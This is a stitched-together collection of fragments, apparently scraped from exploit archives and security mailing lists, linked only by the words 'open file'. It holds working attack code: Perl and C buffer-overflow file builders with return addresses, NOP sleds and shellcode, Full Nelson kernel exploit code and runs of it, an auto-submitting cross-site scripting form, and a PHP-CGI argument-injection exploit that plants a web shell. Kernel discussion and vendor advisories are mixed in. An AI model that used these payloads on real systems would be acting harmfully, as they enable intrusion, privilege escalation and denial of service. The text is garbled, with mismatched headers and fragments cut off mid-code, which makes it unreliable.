ZDI-07-078: St. Bernard Open File Manager Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-078.html
December 17, 2007
-- CVE ID:
CVE-2007-6281
-- Affected Vendor:
St. Bernard
PoC:
#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# AyeView freezes and after few seconds crashes...
# Tested on Windows XP SP2 & Windows 2000 SP4
my $code="\x47\x49\x46\x38\x39\x61\xff\xff\xff\xff\x0e".
"\x00\x00\x2c\x00\x00\x00\x00\xff\xff\xff\xff\x00";
>>>>> "act" as hardlinks. Could that be fixed somehow? (I did look at the
>>>>> kernel fs/proc/base.c but did not make much sense to me...)
>>>>>
>>>> Just looked more carefully at fs/proc/base.c. That behavior is due
>>>> to proc_fd_info(), called from proc_fd_link(), obtaining file->f_path,
>>>> which in turn contains the reference to the open file's dentry and
>>>> hence its inode. That's exactly why those symlinks behave as hardlinks.
>>>> This behavior assumes that if you were able to open the file,
>>>> you have all the necessary transition permissions to access its inode.
>>>> But in order to follow them you need privileges to read the process
>>>> memory, which hardly restricts the impact of this behavior. I don't
Katharsis, all from #dark-coders and others;]
PoC:
#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# FastStone Image Viewer v3.6 simply crashes
# Tested on Windows 2000 SP4
#-----INFO----------------------
#EAX 00002847
#ECX 00000000
Last login: Tue Dec 13 12:48:54 2010
[root@localhost~]#nano full-nelson.c
[root@localhost~]#gcc-o full-nelson.c full-nelson
[root@localhost~]#./full-nelson
[*] Failed to open file descriptors.
[root@localhost~]# uname-a
Linux localhost.localdomain 2.6.18-194.26.1.el5 # 1 SMP Thu Nov 9 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
[root@localhost~]#
My 10 cents:)
pipe(fildes);
fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
fildes[3] = open("/dev/zero", O_RDONLY);
if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
printf("[*] Failed to open file descriptors.\n");
return -1;
}
/* Resolve addresses of relevant symbols */
printf("[*] Resolving kernel addresses...\n");
char header2[]=
"\x22\x20\x2F\x3E\x0D\x0A\x3C\x2F\x65\x6E\x74\x72\x79\x3E\x0D"
"\x0A\x3C\x2F\x61\x73\x78\x3E";
int main(int argc,char *argv[])
{ FILE *openfile;
char exploit[1360];
char junk[1012];
char ret[]="\x68\xD5\x85\x7C";
char nop[]="\x90";
printf("==== marakesh city =====\n");
I've tested on:
- Image browser -- by pressing [Open] in File Manager, so that the
application crashes immediately, and File Manager barking "Unable to
open file".
- Gallery -- begins to scan all images in phone memory and card, and
crashes soon, obviously when it encounters nokiacrash.jpg. So, just
putting this file anywhere in the filesystem is Gallery DoS.
* Uli Schlachter reported that bip does not properly handle invalid
data during authentication, resulting in a daemon crash
(CVE-2010-3071).
* Julien Tinnes reported that bip does not check the number of open
file descriptors against FD_SETSIZE, resulting in a stack buffer
overflow (CVE-2012-0806).
Impact
======
such corruption to result in database corruption or arbitrary code
execution, though we have no such exploit and are not aware of any
such exploits in use in the wild.
CVE-2008-0947: In 1.4 and later, this bug can only be triggered in
configurations that allow large numbers of open file descriptors in a
process.
CVE-2008-0948: In versions before 1.3, this bug can be triggered in
similar circumstances, but is further limited to platforms not
defining certain macros in certain C system header files. Solaris 10
|| > User2 can not write to file descriptor 4
|| > User2 _can_ write to /proc/$$/fd/4
However, as has been pointed out elsewhere in this thread, openat()
will at this point allow User2 to open the file for writing, provided
that he has an open file descriptor on the directory, opened with O_SEARCH.
This is a valid but different attack from the race above.
Ciao. Vincent.
--
import sys
print "[x] Windows Media Player 11 DoS by Adonis a.K.a NtWaK0 and Abed aka Nophie."
try:
f = open("test.au",'w')
except IOError as e:
print "Unable to open file ", e
sys.exit(0)
print "[x] File successfully opened for writing."
try:
f.write(head) # 'head' is built earlier in the original script (not shown in this excerpt)
Vulnerable Variable : kluc
Address : http://Example.com/index.php?session=0&action=search
Change Example.com to the script's address on a real site, save as ircrash.html, open the file in a browser and see your cookie.
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://Example.com/index.php?session=0&action=search" method="POST" name="form">
VERSION = 11.3
00:37 linups:../expl/kernel > uname -r
2.6.34.4-0.1-desktop
00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
00:37 linups:../expl/kernel > ./test
[*] Failed to open file descriptors.
print "[+] Exploiting.....\n" ;
my $buff="\x41\x41\x41\x41" x 1000000 ;
print "[+] Creating Evil File" ;
open($FILE, ">>$file") or die "Cannot open $file";
print $FILE $buff;
close($FILE);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";
"\x02\x16\x69\x72\xd7\x70\xa6\x73\xba\x1d\x90\xe0\x3e\x7e\xf1\x8c";
my $ret ="\x1a\x0f\x46\x77" ; # jmp ESP in Windows VISTA
my $nop ="\x90" x 20 ;# some lame nops lol
my $exploit = $acc.$ret.$nop.$shellcode;
print "[+] Creating Evil File" ;
open($FILE, ">>$file") or die "Cannot open $file";
print $FILE $exploit;
close($FILE);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";
> "act" as hardlinks. Could that be fixed somehow? (I did look at the
> kernel fs/proc/base.c but did not make much sense to me...)
>
Just looked more carefully at fs/proc/base.c. That behavior is due to
proc_fd_info(), called from proc_fd_link(), obtaining file->f_path, which in turn
contains the reference to the open file's dentry and hence its inode. That's exactly
why those symlinks behave as hardlinks. This behavior assumes that if you were
able to open the file, you have all the necessary transition permissions to access
its inode. But in order to follow them you need privileges to read the process
memory, which hardly restricts the impact of this behavior. I don't think this
should be fixed, since /proc/<PID>/fd/ is mainly for debugging purposes.
char header2[]=
"\x2f\x3e\x0d\x3c\x2f\x65\x6e\x74\x72\x79\x3e\x0d\x3c\x2f\x77\x61"
"\x78\x3e";
int main(int argc,char *argv[])
{ FILE *openfile;
char exploit[1290];
char junk[925];
char ret[]="\x68\xD5\x85\x7C";// JMP kernel32.dll esp (Windows Trust SP2)
char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
printf(" CoDEd By Ismail ==> marrakesh city");
> VERSION = 11.3
> 00:37 linups:../expl/kernel > uname -r
> 2.6.34.4-0.1-desktop
> 00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
> 00:37 linups:../expl/kernel > ./test
> [*] Failed to open file descriptors.
>
$o_db_user_name = $_POST['o_db_user_name'];
$o_db_password = $_POST['o_db_password'];
//read in the file
$file = "../functions/db_connect.php";
$fh = fopen($file, 'r+');
$contents = fread($fh, filesize($file));
//set up the text to change
$text_to_change = array();
$new_text = array();
openSUSE 11.2 and 11.3 do not have ECONET compiled,
openSUSE 11.1 has ECONET, but not the 0 ptr deref issue.
The CVE-2010-4258 problem is however in all openSUSEs.
> (To recap:
>
> While file permissions allow writing, directory permissions do not
> allow any access at all.
>
> guest has open file descriptor for reading.
>
> Trouble is that guest can upgrade file descriptor to one that allows
> writing.)
>
Enough substituting terms. guest doesn't upgrade file descriptors, he only gets
The nfs4_proc_lock function in fs/nfs/nfs4proc.c in the NFSv4 client in
the Linux kernel before 2.6.31-rc4 allows remote NFS servers to cause
a denial of service (NULL pointer dereference and panic) by sending a
certain response containing incorrect file attributes, which trigger
attempted use of an open file that lacks NFSv4 state. (CVE-2009-3726)
Additionally, it includes the fixes from the stable kernel version
2.6.27.39. It also fixes issues with the bnx2 module in which the
machine could become unresponsive. For details, see the package
changelog.
> pipe(fildes);
> fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
> fildes[3] = open("/dev/zero", O_RDONLY);
>
> if(fildes[0]< 0 || fildes[1]< 0 || fildes[2]< 0 || fildes[3]< 0) {
> printf("[*] Failed to open file descriptors.\n");
> return -1;
> }
>
> /* Resolve addresses of relevant symbols */
> printf("[*] Resolving kernel addresses...\n");
Buffer overflow in the RPC library (lib/rpc/rpc_dtablesize.c) used
by libgssrpc and kadmind in MIT Kerberos 5 (krb5) 1.2.2, and probably
other versions before 1.3, when running on systems whose unistd.h
does not define the FD_SETSIZE macro, allows remote attackers to cause
a denial of service (crash) and possibly execute arbitrary code by
triggering a large number of open file descriptors.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2008-0948 to this issue.
RPM Updated:
{
global $html, $shell;
/* Exploiting */
$payload = "<?php \$myFile = \"legalpentest.php\"; \$filehandle =
fopen(\$myFile, 'w') or die(\"can't open file\"); \$Data=$shell;
fwrite(\$filehandle, \$Data);fclose(\$filehandle);";
$packet = "POST
".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";